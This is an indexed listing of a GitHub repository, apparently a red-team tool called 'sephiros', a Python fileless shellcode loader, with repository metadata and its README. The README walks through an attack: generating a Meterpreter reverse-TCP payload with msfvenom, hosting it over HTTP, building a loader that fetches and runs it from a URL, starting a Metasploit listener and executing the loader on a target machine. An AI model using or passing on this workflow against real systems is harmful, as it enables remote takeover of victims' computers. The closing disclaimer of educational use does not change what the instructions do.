Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/elmerikh/sephiros
Fileless Shellcode Loader with Python
https://github.com/elmerikh/sephiros
fileless-attack fileless-shellcode python-redteam python-shellcode redteam-shellcode shellcode-execute shellcode-fileless shellcode-injection shellcode-injector shellcode-loader shellcode-python
Last synced: about 2 months ago
JSON representation
Fileless Shellcode Loader with Python
- Host: GitHub
- URL: https://github.com/elmerikh/sephiros
- Owner: ELMERIKH
- Created: 2024-02-20T16:47:29.000Z (11 months ago)
- Default Branch: master
- Last Pushed: 2024-02-22T13:37:28.000Z (11 months ago)
- Last Synced: 2024-05-30T01:18:05.441Z (7 months ago)
- Topics: fileless-attack, fileless-shellcode, python-redteam, python-shellcode, redteam-shellcode, shellcode-execute, shellcode-fileless, shellcode-injection, shellcode-injector, shellcode-loader, shellcode-python
- Language: Python
- Homepage:
- Size: 9.33 MB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: readme.md
Awesome Lists containing this project
README
![Alt text](<2024-02-20 07_45_57-C__Windows_System32_cmd.exe.png>)
Greetings
-------------------sephiroth is a Fileless Shellcode Loader with Python :
Usage: python Sephiros.py -url 'urlforshellcode'
u can generate a ps1 script with -ps instead of building into exe
python Sephiros.py -url 'urlforshellcode' -ps
you can also just embed shellcode into the PE directly using -sh 'pathofshellcode'
python Sephiros.py -sh 'pathto_shellcode'
setup
---------pip install -r requirements.txt
python Sephiroth.py
fileless execution example:
-------------------
generate shellcode with:msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=0.0.0.0 LPORT=5555 -f raw -o shellcode
python3 -m http.server 80
then:
python Sephiroth.py -url http://yourip/shellcode
start metasploit listener
execute PE on target machine
todo
--------
asymetric encryption to the shellcodeDISCLAIMER :
----------------------
ME The author takes NO responsibility and/or liability for how you choose to use any of the tools/source code/any files provided. ME The author and anyone affiliated with will not be liable for any losses and/or damages in connection with use of Sephiros. By using Sephiros or any files included, you understand that you are AGREEING TO USE AT YOUR OWN RISK. Once again Sephiros is for EDUCATION and/or RESEARCH purposes ONLY